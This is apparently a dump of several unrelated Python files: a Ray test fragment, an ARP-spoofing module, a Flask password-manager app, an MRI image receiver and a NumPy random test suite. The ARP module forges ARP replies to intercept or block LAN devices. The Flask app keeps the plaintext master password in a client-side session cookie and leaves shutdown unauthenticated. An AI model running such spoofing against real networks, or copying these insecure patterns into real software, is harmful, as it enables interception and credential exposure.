logs_dir = os.path.join(info["session_dir"], "logs")
# Wait till first worker log file is created.
while True:
log_file_paths = glob.glob("{}/worker*.out".format(logs_dir))
if len(log_file_paths) == 0:
time.sleep(0.2)
else:
break
with open(log_file_paths[0], "wb") as f:
f.write(b"\xe5abc\nline2\nline3\n")
f.write(b"\xe5abc\nline2\nline3\n")
f.write(b"\xe5abc\nline2\nline3\n")
f.flush()
# Wait till the log monitor reads the file.
time.sleep(1.0)
# Make sure that nothing has died.
assert ray.services.remaining_processes_alive()
@pytest.mark.skip(reason="This test is too expensive to run.")
def test_move_log_files_to_old(shutdown_only):
info = ray.init(num_cpus=1)
logs_dir = os.path.join(info["session_dir"], "logs")
@ray.remote
class Actor(object):
def f(self):
print("function f finished")
# First create a temporary actor.
actors = [
Actor.remote() for i in range(ray_constants.LOG_MONITOR_MAX_OPEN_FILES)
]
ray.get([a.f.remote() for a in actors])
# Make sure no log files are in the "old" directory before the actors
# are killed.
assert len(glob.glob("{}/old/worker*.out".format(logs_dir))) == 0
# Now kill the actors so the files get moved to logs/old/.
[a.__ray_terminate__.remote() for a in actors]
while True:
log_file_paths = glob.glob("{}/old/worker*.out".format(logs_dir))
if len(log_file_paths) > 0:
with open(log_file_paths[0], "r") as f:
assert "function f finished\n" in f.readlines()
break
# Make sure that nothing has died.
assert ray.services.remaining_processes_alive()
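# A usage sketch (not part of the original test module): these tests target
# pytest, so a single test can be selected by name once the file path is
# known, e.g.
#
#     pytest -v -k "test_load_balancing" <path-to-this-test-file>
#
# The placeholder path is an assumption; substitute the actual location of
# this file in the Ray source tree.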
|
arp_spoof.py
|
"""
Based on ARP packets received, sends out spoofed ARP packets.
"""
from host_state import HostState
import scapy.all as sc
import threading
import utils
import time
# Min seconds between successive spoofed packets
MIN_ARP_SPOOF_INTERVAL = 0.01
# If we want to block a device, we use the following corrupt MAC address
# as the source.
CORRUPT_MAC_ADDRESS = '00:11:22:33:44:55'
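# For illustration only (not used by this module): with the scapy primitives
# imported above, a "blocking" ARP reply for a hypothetical victim would look
# roughly as follows; victim_ip, victim_mac, and gateway_ip are placeholders
# rather than values defined in this file:
#
#     blocking_arp = sc.ARP(op=2, psrc=gateway_ip, pdst=victim_ip,
#                           hwdst=victim_mac, hwsrc=CORRUPT_MAC_ADDRESS)
#     sc.send(blocking_arp, verbose=0)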
class ArpSpoof(object):
def __init__(self, host_state):
assert isinstance(host_state, HostState)
self._host_state = host_state
self._lock = threading.Lock()
self._active = True
self._thread = threading.Thread(target=self._arp_spoof_loop)
self._thread.daemon = True
def start(self):
with self._lock:
self._active = True
utils.log('[Arp Spoof] Starting.')
self._thread.start()
def _arp_spoof_loop(self):
prev_ip_mac_dict = None
while True:
if not self._host_state.is_inspecting():
time.sleep(2)
continue
time.sleep(1)
with self._lock:
if not self._active:
return
with self._host_state.lock:
if not self._host_state.has_consent:
utils.log('[ARP Spoof] No consent; no spoofing.')
continue
# Get ARP cache
ip_mac_dict = self._host_state.get_ip_mac_dict_copy()
gateway_ip = self._host_state.gateway_ip
if str(ip_mac_dict) != str(prev_ip_mac_dict):
prev_ip_mac_dict = ip_mac_dict
utils.log('[ARP Spoof] Cache:', ip_mac_dict)
utils.log(
'[ARP Spoof] Whitelist:', self._host_state.device_whitelist
)
# Get gateway MAC addr
try:
gateway_mac = ip_mac_dict[gateway_ip]
except KeyError:
continue
whitelist_ip_mac = []
# Add gateway
whitelist_ip_mac.append((gateway_ip, gateway_mac))
# Build device-to-device whitelist
for ip, mac in ip_mac_dict.items():
device_id = utils.get_device_id(mac, self._host_state)
if device_id not in self._host_state.device_whitelist:
utils.log('[ARP Spoof] Ignore:', ip, mac)
continue
whitelist_ip_mac.append((ip, mac))
# Spoof individual devices on the network.
for (victim_ip, victim_mac) in ip_mac_dict.items():
if victim_ip == gateway_ip:
continue
# Check against whitelist.
victim_device_id = \
utils.get_device_id(victim_mac, self._host_state)
if victim_device_id not in self._host_state.device_whitelist:
utils.log('[ARP Spoof] Ignore:', victim_ip, victim_mac)
continue
if utils.TEST_OUI_LIST:
victim_mac_oui = utils.get_oui(victim_mac)
if victim_mac_oui not in utils.TEST_OUI_LIST:
continue
utils.safe_run(
self._arp_spoof,
args=(victim_device_id, victim_mac, victim_ip, whitelist_ip_mac)
)
with self._lock:
if not self._active:
return
time.sleep(max(MIN_ARP_SPOOF_INTERVAL, 2.0 / len(ip_mac_dict)))
def _arp_spoof(self, victim_device_id, victim_mac, victim_ip, whitelist_ip_mac):
"""Sends out spoofed packets for a single target."""
# Check if we want to block this device now
block_device = False
try:
with self._host_state.lock:
(block_start_ts, block_stop_ts) = self._host_state.block_device_dict[victim_device_id]
if block_start_ts <= time.time() <= block_stop_ts:
block_device = True
except KeyError:
pass
with self._host_state.lock:
spoof_arp = self._host_state.spoof_arp
for dest_ip, dest_mac in whitelist_ip_mac:
if victim_ip == dest_ip:
continue
dest_arp = sc.ARP()
dest_arp.op = 2
dest_arp.psrc = victim_ip
dest_arp.hwdst = dest_mac
dest_arp.pdst = dest_ip
if not spoof_arp:
dest_arp.hwsrc = victim_mac
utils.log('[Arp Spoof] Restoring', victim_ip, '->', dest_ip)
victim_arp = sc.ARP()
victim_arp.op = 2
victim_arp.psrc = dest_ip
victim_arp.hwdst = victim_mac
victim_arp.pdst = victim_ip
if not spoof_arp:
victim_arp.hwsrc = dest_mac
utils.log('[Arp Spoof] Restoring', dest_ip, '->', victim_ip)
if block_device:
dest_arp.hwsrc = CORRUPT_MAC_ADDRESS
victim_arp.hwsrc = CORRUPT_MAC_ADDRESS
sc.send(victim_arp, verbose=0)
sc.send(dest_arp, verbose=0)
def stop(self):
utils.log('[Arp Spoof] Stopping.')
with self._lock:
self._active = False
self._thread.join()
utils.log('[Arp Spoof] Stopped.')
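# A minimal usage sketch (assumes a fully initialized HostState from
# host_state.py; the construction below is hypothetical and not part of the
# original module):
#
#     host_state = HostState()
#     spoofer = ArpSpoof(host_state)
#     spoofer.start()
#     ...                      # spoofing runs on the background thread
#     spoofer.stop()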
|
views.py
|
from binascii import hexlify, unhexlify
from passlib.hash import pbkdf2_sha256
from threading import Thread
from time import sleep
import os
from flask_login import login_user, login_required
from flask import (
render_template, request,
redirect, url_for, json,
jsonify, make_response, session
)
from app import application, db, login_manager
from models import User, Passwords
from pm import PasswordManager
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
def CloseApp():
#Closes Application
sleep(0.5)
os._exit(1)
return(0)
#Displays the index page containing options for
#New User, Login, and Shutdown
@application.route('/', methods = ['POST', 'GET'])
def Index():
if request.method == 'POST':
if request.form['login'] == 'New User':
return(redirect(url_for('SignUp')))
elif request.form['login'] == 'Login':
return(redirect(url_for('Login')))
elif request.form['login'] == 'Shutdown':
return(redirect(url_for('Shutdown')))
elif request.method == 'GET':
return(render_template('index.html'))
#Displays the login page
@application.route('/login', methods = ['POST', 'GET'])
def Login():
try:
if request.method == 'GET':
return(render_template('login.html'))
elif request.method == 'POST':
username = request.form['Username']
password = request.form['Password']
db_user = User.query.filter_by(username=username).first()
            if db_user is not None and pbkdf2_sha256.verify(password, db_user.password):
login_user(db_user)
salt = db_user.salt
salt = salt.encode()
pass_manager = PasswordManager(password, salt)
session['key'] = password
session['salt'] = salt
resp = make_response(redirect(url_for('Main')))
return(resp)
else:
return(render_template('login.html'))
except Exception as e:
error = str(e)
return render_template('error.html', error=error)
#Displays the main page containing options for
#New Password, View Passwords, Update Password
#Delete Password, and Logout
@application.route('/main', methods = ['POST', 'GET'])
@login_required
def Main():
try:
if request.method == 'POST':
#redirect to another function using button value
return(redirect(url_for(request.form['pass'])))
elif request.method == 'GET':
return(render_template('main.html'))
except Exception as e:
error = str(e)
return render_template('error.html', error=error)
#Displays the newpassword page
@application.route('/newpassword', methods = ['POST', 'GET'])
@login_required
def newPassword():
if request.method == 'POST':
account = request.form['account'] #account name
size = request.form['size'] #requested password size
pass_manager = PasswordManager(session['key'], session['salt'])
pass_manager.addPassword(account=account, size=size)#create new password
return(redirect(url_for('Main')))
elif request.method == 'GET':
return(render_template('newpassword.html'))
#Displays the add page
@application.route('/add', methods = ['POST', 'GET'])
@login_required
def addPassword():
if request.method == 'GET':
return(render_template('addpassword.html'))
elif request.method == 'POST':
account = request.form['Account']
password = request.form['Password']
confirm_password = request.form['Confirm Password']
if confirm_password != password:
            return(redirect(url_for('addPassword')))
else:
pass_manager = PasswordManager(session['key'], session['salt'])
pass_manager.addPassword(account, password)
return(redirect(url_for('Main')))
return(0)
#Displays the delete page
@application.route('/delete', methods = ['POST', 'GET'])
@login_required
def deletePassword():
pass_manager = PasswordManager(session['key'], session['salt'])
data = pass_manager.getPasswords()
if request.method == 'POST':
account = request.form['account']
pass_manager.deletePassword(account)
return(redirect(url_for('Main')))
elif request.method == 'GET':
return(render_template('delete.html', data=data))
#Displays the password page
@application.route('/passwords', methods = ['POST', 'GET'])
@login_required
def displayPasswords():
if request.method == 'POST':
if request.form['pass'] == "Logout":
return(redirect(url_for('logout')))
elif request.method == 'GET':
pass_manager = PasswordManager(session['key'], session['salt'])
data = pass_manager.getPasswords()
return render_template('passwords.html', data=data)
#Displays the sign up page for new users
@application.route('/signup', methods = ['POST', 'GET'])
def SignUp():
try:
if request.method == 'GET':
return(render_template('signup.html'))
elif request.method == 'POST':
username = request.form['Username']
password = request.form['Password']
confirm_password = request.form['Confirm_Password']
if confirm_password != password:
return(redirect(url_for('SignUp')))
else:
password = pbkdf2_sha256.hash(password)
salt = os.urandom(16)
salt = hexlify(salt).decode()
user = User(username=username, password=password, salt=salt)
db.session.add(user)
db.session.commit()
return(redirect(url_for('Login')))
except Exception as e:
error = str(e)
return render_template('error.html', error=error)
return(0)
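# For illustration (independent of the routes above): passlib's pbkdf2_sha256
# hash/verify pair used in SignUp and Login round-trips as follows.
#
#     hashed = pbkdf2_sha256.hash("example-password")
#     pbkdf2_sha256.verify("example-password", hashed)   # -> True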
#Displays the shutdown page and closes the app
@application.route('/shutdown')
def Shutdown():
resp = make_response(render_template('shutdown.html'))
#creates new thread for CloseApp function
t = Thread(target=CloseApp)
t.daemon = True
t.start()
#returns shutdown template
return(resp)
#Displays the logout page and closes the app
@application.route('/logout')
@login_required
def logout():
    #removes the user's cookies
resp = make_response(render_template('logout.html'))
t = Thread(target=CloseApp)
t.daemon = True
t.start()
return(resp)
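# A minimal run sketch (assumes the companion app.py module exposes the Flask
# `application` object imported at the top of this file; not part of the
# original views module):
#
#     from app import application
#     application.run(host='127.0.0.1', port=5000)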
|
receive_nii.py
|
#!/usr/bin/env python
import argparse
from collections import namedtuple
import os
import socket
import sys
from time import sleep
import threading
import SocketServer
import external_image
import nibabel as nb
import numpy as np
SocketServer.TCPServer.allow_reuse_address = True
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, callback, infoclient, *args, **keys):
self.callback = callback
self.infoclient = infoclient
SocketServer.BaseRequestHandler.__init__(self, *args, **keys)
def handle(self):
self.callback(self.infoclient, self.request)
'''
cur_thread = threading.current_thread()
response = "{}: {}".format(cur_thread.name, data)
self.request.sendall(response)
'''
def handler_factory(callback, infoclient):
def createHandler(*args, **keys):
return ThreadedTCPRequestHandler(callback, infoclient, *args, **keys)
return createHandler
def process_data_callback(infoclient, sock):
infoclient.process_data(sock)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class ImageReceiver(object):
def __init__(self, args):
self.host = args.host
self.port = args.port
self._is_running = None
self._server = None
self.imagestore = []
self.save_location = args.save_directory
self.current_uid = None
self.current_series_hdr = None
self.save_4d = args.four_dimensional
self.stop_after_one_series = args.single_series
self.ei = external_image.ExternalImage("ExternalImageHeader")
def stop(self):
self._server.shutdown()
self._is_running = None
self._server = None
if self.save_4d:
self.save_imagestore()
print "image receiver stopped"
def start(self):
self._startserver()
def check(self):
if not self._is_running:
raise RuntimeError('Server is not running')
return self.imagestore
def _startserver(self):
if self._is_running:
raise RuntimeError('Server already running')
server = ThreadedTCPServer((self.host, self.port),
handler_factory(process_data_callback, self))
ip, port = server.server_address
print "image receiver running at %s on port %d" % (ip, port)
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
self._is_running = True
self._server = server
def process_data(self, sock):
in_bytes = sock.recv(self.ei.get_header_size())
if len(in_bytes) != self.ei.get_header_size():
raise ValueError(
"Header data wrong size: expected %d bytes, got %d" %
(self.ei.get_header_size(), len(in_bytes))
)
print "processing %d header data bytes" % len(in_bytes)
hdr = self.ei.process_header(in_bytes)
# validation
if self.current_uid != hdr.seriesUID:
assert hdr.currentTR == 1
self.current_uid = hdr.seriesUID
self.current_series_hdr = hdr
img_data = ""
        while len(img_data) < self.ei.get_image_size():
            in_bytes = sock.recv(4096)
            if not in_bytes:
                break  # peer closed early; the size check below will report it
            img_data += in_bytes
if len(img_data) != self.ei.get_image_size():
raise ValueError(
"Image data wrong size: expected %d bytes, got %d" %
(self.ei.get_image_size(), len(img_data))
)
print "processing %d image data bytes" % len(img_data)
new_ei = self.ei.process_image(img_data)
if new_ei:
if (isinstance(new_ei, nb.Nifti1Image) and
new_ei not in self.imagestore):
self.imagestore.append(new_ei)
if not self.save_4d:
self.save_nifti(new_ei)
if hdr.currentTR + 1 == hdr.totalTR:
if self.save_4d:
self.save_imagestore()
self.imagestore = []
if self.stop_after_one_series:
self.stop()
else:
self.stop()
def save_nifti(self, img):
if len(img.get_shape()) == 3 or img.get_shape()[3] == 1:
index = len(self.imagestore) - 1
filename = os.path.join(
self.save_location,
'img-%s-%05d.nii.gz' % (self.current_uid, index))
else:
filename = os.path.join(self.save_location,
'img-%s.nii.gz' % self.current_uid)
img.to_filename(filename)
print "Saved to %s" % filename
def save_imagestore(self):
if len(self.imagestore) == 0:
return
base_shape = self.imagestore[0].get_shape()
new_shape = (base_shape[0], base_shape[1], base_shape[2],
len(self.imagestore))
new_data = np.zeros(new_shape)
for i in xrange(new_shape[3]):
assert self.imagestore[i].get_shape() == \
self.imagestore[0].get_shape()
new_data[:,:,:,i] = self.imagestore[i].get_data()
new_img = nb.Nifti1Image(new_data, self.imagestore[0].get_affine())
new_img.get_header().set_zooms((
self.current_series_hdr.pixelSpacingReadMM,
self.current_series_hdr.pixelSpacingPhaseMM,
self.current_series_hdr.pixelSpacingSliceMM,
self.current_series_hdr.repetitionTimeMS +
self.current_series_hdr.repetitionDelayMS))
self.save_nifti(new_img)
def parse_args(args):
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", default="localhost",
help="Name of the host to run the image receiver on.")
parser.add_argument("-p", "--port", type=int, default="15000",
help="Port to run the image receiver on.")
parser.add_argument("-d", "--save_directory", default=".",
help="Directory to save images to.")
parser.add_argument("-f", "--four_dimensional", action="store_true",
help="Store each image series as a single 4D file.")
parser.add_argument("-s", "--single_series", action="store_true",
help="Shut down the receiver after one entire series "
"has been read.")
    return parser.parse_args(args)
def main(argv):
    args = parse_args(argv[1:])
receiver = ImageReceiver(args)
receiver.start()
while(receiver._is_running):
sleep(1)
if __name__ == "__main__":
sys.exit(main(sys.argv))
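# Example invocation (values are illustrative only; adjust to your setup):
#
#     python receive_nii.py --host 0.0.0.0 --port 15000 \
#         --save_directory /tmp/images --four_dimensional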
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
run_module_suite, assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState, np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
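# For illustration (not part of the test suite): the seeding rules exercised
# above amount to "seeds must be unsigned 32-bit integers, or 1-D sequences of
# them", and a fixed seed makes draws reproducible:
#
#     rs = np.random.RandomState(0)
#     rs.randint(1000)        # -> 684, matching test_scalar above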
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
        # We use an md5 hash of generated sequences of 1000 samples
        # in the range [0, 6) for all but bool, where the range
        # is [0, 2). Hashes are for little-endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
        # bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
        # When stored in Numpy arrays, `lbnd` is cast
        # as np.int64, and `ubnd` is cast as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
        # causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
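    # For illustration (not part of the original test): on the older NumPy
    # versions this suite targets, the pitfall described above can be seen
    # directly, because mixing int64 and uint64 promotes both operands to
    # float64 before comparing:
    #
    #     np.int64(2**63 - 1) >= np.uint64(2**63)   # unexpectedly True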
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
